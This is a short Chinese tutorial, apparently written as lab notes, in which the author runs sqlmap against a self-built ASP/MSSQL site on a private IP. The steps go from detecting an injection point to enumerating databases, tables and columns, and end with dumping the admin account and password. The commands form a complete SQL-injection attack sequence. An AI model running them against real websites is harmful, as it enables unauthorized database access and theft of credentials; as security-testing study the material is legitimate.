今天搭建了一个asp+mssql数据库的环境用于安全测试学习

1.判断注入点及获取网站信息：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

web server operating system: windows 2003 or XP

web Application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

2.获取所有数据库：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs

网站用的数据库是这个sqlZR

3.获取网站当前使用的数据库：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

4.获取数据库中的表名：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

5.获取数据表中的字段名：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

6.获取字段中的内容

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

看到了吧，几条命名就把管理员的账号密码给跑出来了。